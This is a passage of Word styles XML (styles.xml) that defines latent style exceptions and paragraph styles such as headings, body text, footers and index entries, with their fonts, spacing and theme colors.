    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="table of authorities"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="macro"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="toa heading"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="List"/>
    <w:lsdException w:qFormat="1" w:uiPriority="1" w:semiHidden="0" w:name="List Bullet"/>
    <w:lsdException w:qFormat="1" w:uiPriority="1" w:semiHidden="0" w:name="List Number"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="List 2"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="List 3"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="List 4"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="List 5"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="List Bullet 2"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="List Bullet 3"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="List Bullet 4"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="List Bullet 5"/>
    <w:lsdException w:qFormat="1" w:uiPriority="1" w:semiHidden="0" w:name="List Number 2"/>
    <w:lsdException w:qFormat="1" w:uiPriority="18" w:semiHidden="0" w:name="List Number 3"/>
    <w:lsdException w:uiPriority="18" w:semiHidden="0" w:name="List Number 4"/>
    <w:lsdException w:qFormat="1" w:uiPriority="18" w:semiHidden="0" w:name="List Number 5"/>
    <w:lsdException w:qFormat="1" w:uiPriority="19" w:semiHidden="0" w:name="Title"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Closing"/>
    <w:lsdException w:qFormat="1" w:uiPriority="20" w:semiHidden="0" w:name="Signature"/>
    <w:lsdException w:uiPriority="1" w:semiHidden="0" w:name="Default Paragraph Font"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Body Text"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Body Text Indent"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="List Continue"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="List Continue 2"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="List Continue 3"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="List Continue 4"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="List Continue 5"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Message Header"/>
    <w:lsdException w:qFormat="1" w:uiPriority="19" w:semiHidden="0" w:name="Subtitle"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Salutation"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Date"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Body Text First Indent"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Body Text First Indent 2"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Note Heading"/>
    <w:lsdException w:qFormat="1" w:uiPriority="99" w:semiHidden="0" w:name="Body Text 2"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Body Text 3"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Body Text Indent 2"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Body Text Indent 3"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Block Text"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Hyperlink"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="FollowedHyperlink"/>
    <w:lsdException w:qFormat="1" w:uiPriority="1" w:semiHidden="0" w:name="Strong"/>
    <w:lsdException w:uiPriority="20" w:semiHidden="0" w:name="Emphasis"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Document Map"/>
    <w:lsdException w:qFormat="1" w:uiPriority="99" w:semiHidden="0" w:name="Plain Text"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="E-mail Signature"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Normal (Web)"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="HTML Acronym"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="HTML Address"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="HTML Cite"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="HTML Code"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="HTML Definition"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="HTML Keyboard"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="HTML Preformatted"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="HTML Sample"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="HTML Typewriter"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="HTML Variable"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Normal Table"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="annotation subject"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Simple 1"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Simple 2"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Simple 3"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Classic 1"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Classic 2"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Classic 3"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Classic 4"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Colorful 1"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Colorful 2"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Colorful 3"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Columns 1"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Columns 2"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Columns 3"/>
    <w:lsdException w:qFormat="1" w:uiPriority="99" w:semiHidden="0" w:name="Table Columns 4"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Columns 5"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Grid 1"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Grid 2"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Grid 3"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Grid 4"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Grid 5"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Grid 6"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Grid 7"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Grid 8"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table List 1"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table List 2"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table List 3"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table List 4"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table List 5"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table List 6"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table List 7"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table List 8"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table 3D effects 1"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table 3D effects 2"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table 3D effects 3"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Contemporary"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Elegant"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Professional"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Subtle 1"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Subtle 2"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Web 1"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Web 2"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Web 3"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Balloon Text"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="59" w:semiHidden="0" w:name="Table Grid"/>
    <w:lsdException w:uiPriority="99"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qFormat="1"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before="40" w:after="160" w:line="288" w:lineRule="auto"/>
    </w:pP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style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="253"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:pageBreakBefore/>
      <w:spacing w:before="0" w:after="360" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="254"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:after="60" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="577289" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="24"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="276"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="7E97AD" w:themeColor="accent1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="277"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="18"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="7E97AD" w:themeColor="accent1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="278"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="18"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="3A4C5B" w:themeColor="accent1" w:themeShade="80"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="279"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="18"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="3A4C5B" w:themeColor="accent1" w:themeShade="80"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="280"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="18"/>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9">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="281"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="18"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="75000"/>
            <w14:lumOff w14:val="25000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="282"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="18"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="8"/>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default="1" w:styleId="88">
    <w:name w:val="Default Paragraph Font"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="1"/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="106">
    <w:name w:val="Normal Table"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:tblPr>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="252"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="Block Text"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="2" w:space="10"/>
        <w:left w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="2" w:space="10"/>
        <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="2" w:space="10"/>
        <w:right w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="2" w:space="10"/>
      </w:pBdr>
      <w:ind w:left="1152" w:right="1152"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="7E97AD" w:themeColor="accent1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="13">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="259"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="14">
    <w:name w:val="Body Text 2"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="260"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="480" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="15">
    <w:name w:val="Body Text 3"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="261"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="16">
    <w:name w:val="Body Text First Indent"/>
    <w:basedOn w:val="13"/>
    <w:link w:val="262"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="200"/>
      <w:ind w:firstLine="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="17">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="263"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="18">
    <w:name w:val="Body Text First Indent 2"/>
    <w:basedOn w:val="17"/>
    <w:link w:val="264"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="200"/>
      <w:ind w:firstLine="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="19">
    <w:name w:val="Body Text Indent 2"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="265"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="480" w:lineRule="auto"/>
      <w:ind w:left="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="20">
    <w:name w:val="Body Text Indent 3"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="266"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="360"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="21">
    <w:name w:val="caption"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="35"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="7E97AD" w:themeColor="accent1"/>
      <w:sz w:val="18"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="22">
    <w:name w:val="Closing"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="268"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="4320"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="23">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="269"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="24">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="23"/>
    <w:next w:val="23"/>
    <w:link w:val="270"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="25">
    <w:name w:val="Date"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="271"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="26">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="272"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="27">
    <w:name w:val="E-mail Signature"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="273"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="28">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="274"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="29">
    <w:name w:val="envelope address"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:framePr w:w="7920" w:h="1980" w:hRule="exact" w:hSpace="180" w:wrap="around" w:vAnchor="margin" w:hAnchor="page" w:xAlign="center" w:yAlign="bottom"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="2880"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="30">
    <w:name w:val="envelope return"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="31">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="250"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="B1C0CD" w:themeColor="accent1" w:themeTint="99" w:sz="4" w:space="6"/>
        <w:left w:val="single" w:color="FFFFFF" w:themeColor="background1" w:sz="4" w:space="20"/>
        <w:right w:val="single" w:color="FFFFFF" w:themeColor="background1" w:sz="2" w:space="20"/>
      </w:pBdr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="32">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="275"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="33">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="249"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="34">
    <w:name w:val="HTML Address"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="283"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="35">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="284"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="36">
    <w:name w:val="index 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="220" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="37">
    <w:name w:val="index 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="440" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="38">
    <w:name w:val="index 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="660" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="39">
    <w:name w:val="index 4"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="880" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="40">
    <w:name w:val="index 5"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1100" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="41">
    <w:name w:val="index 6"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1320" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="42">
    <w:name w:val="index 7"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1540" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="43">
    <w:name w:val="index 8"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1760" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="44">
    <w:name w:val="index 9"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1980" w:hanging="220"/>
    </w:pPr>
